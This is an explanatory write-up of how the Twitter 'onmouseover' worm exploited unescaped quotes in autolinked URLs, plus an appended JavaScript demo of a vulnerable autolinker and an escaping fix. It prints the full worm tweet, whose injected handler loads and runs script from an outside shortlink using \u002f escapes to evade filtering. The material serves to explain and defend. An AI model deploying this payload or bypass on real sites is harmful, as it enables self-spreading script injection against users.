How the Twitter "onmouseover" worm (and others ;) works.

This bug should be called an "input sanitization" bug, not "XSS" and not the "onmouseover bug": the onmouseover handler is only the payload, and any other attribute or event handler could have been injected through the same hole.

Usually Twitter sanitizes user input such as HTML tags, so a tweet cannot change how the page is displayed or how it behaves. When you tweet a URL, Twitter creates the link for you (it adds the <a> tag around the URL). But Twitter forgot to sanitize the part of the link after the @ symbol, so characters such as " that should never reach the generated tag are copied into it unescaped.

This is what happens when you tweet:

http://www.google.com/

Twitter will show it like this:

################################################
http://www.google.com/
################################################

But when you tweet this:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/

Twitter will show it like this:

################################################
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
################################################

The unescaped " after the @ closes the href attribute of the generated <a> tag, so the browser parses everything that follows as further attributes of the link, and a normal link becomes a very dangerous one. Notice that you can do a lot of things with this; here I'll only explain what this worm does.
************************************
style="font-size:999999999999px;"
************************************

This enlarges the font so that the link covers a large area of the page; the user can then hardly avoid moving their mouse over it.

************************************************************************
onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
************************************************************************

This is the tricky part. twitter.com uses the jQuery JavaScript framework, so life becomes much easier for the attacker: the jQuery function $.getScript() loads and executes external JavaScript from any source. \u002f is the JavaScript unicode escape for the / symbol, and writing the slashes this way is another trick to stop Twitter's sanitizer from cleaning the URL out: the HTML filter never sees a /, but the JavaScript engine decodes the escapes when the handler runs. So the real link of the script is:

http://is.gd/fl9A7

List of JavaScript event handlers that work on the <a> tag: onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup

Information about the jQuery JavaScript framework: jQuery http://docs.jquery.com/Main_Page

- @anusoft
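To make the attribute-injection mechanism concrete, here is an added example that is not Twitter's code and not from the original post: a toy autolinker that reproduces the bug (raw URL dropped into the href attribute), the hardened version that HTML-escapes the URL first, a small checker that lists which attributes the browser would actually see on the generated <a> tag, and a decoder that shows what the JavaScript engine makes of the \u002f escapes. The payload is the one quoted above; the URL regex and the benign sample tweet are my own assumptions, since the real parser's grammar is not on the page.

```javascript
// Added example (not Twitter's code): toy autolinker showing the attribute
// injection and its fix. Run with: node autolink.js

// Worm payload exactly as quoted in the post (String.raw keeps the backslashes).
const WORM_TWEET = String.raw`http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/`;

// Constructed benign sample tweet (assumption, not from the post).
const BENIGN_TWEET = 'Search here: http://www.google.com/ today';

// Assumed autolinker grammar: http(s):// followed by anything up to
// whitespace, < or >. The real parser's exact rules are not on the page.
const URL_RE = /https?:\/\/[^\s<>]+/g;

// Vulnerable: interpolates the matched URL unescaped into an attribute value
// and into text content. A " inside the URL terminates the href attribute.
function autolinkVulnerable(tweet) {
  return tweet.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Minimal HTML escaper. The " is the character that matters for the href
// attribute; the others cover text content and single-quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: escape the URL before emitting it into either context.
function autolinkSafe(tweet) {
  return tweet.replace(URL_RE, (url) => {
    const safe = escapeHtml(url);
    return `<a href="${safe}">${safe}</a>`;
  });
}

// Regression check: collect name="value" pairs of the first <a> tag the way a
// browser would split them. A correct autolinker only ever produces href.
function anchorAttributes(html) {
  const attrs = {};
  const tag = html.match(/<a\s([^>]*)>/);
  if (!tag) return attrs;
  const attrRe = /([a-zA-Z-]+)="([^"]*)"/g;
  let m;
  while ((m = attrRe.exec(tag[1])) !== null) attrs[m[1].toLowerCase()] = m[2];
  return attrs;
}

// What the JavaScript engine does with \uXXXX inside the handler's string
// literal: the HTML-level filter never saw a "/", but the executed script does.
function decodeJsUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Stand-alone demonstration.
const vulnerable = anchorAttributes(autolinkVulnerable(WORM_TWEET));
const hardened = anchorAttributes(autolinkSafe(WORM_TWEET));
console.log('vulnerable <a> attributes:', Object.keys(vulnerable));
console.log('hardened  <a> attributes:', Object.keys(hardened));
console.log('handler as the engine runs it:', decodeJsUnicodeEscapes(vulnerable.onmouseover || ''));
```

The benign tweet renders identically through both functions, which is the point of fixing the bug at the output-encoding step: escaping the URL before it is placed in the attribute costs nothing for ordinary links, while any quote smuggled in after the @ turns into &quot; and stays inside the href where it can do no harm.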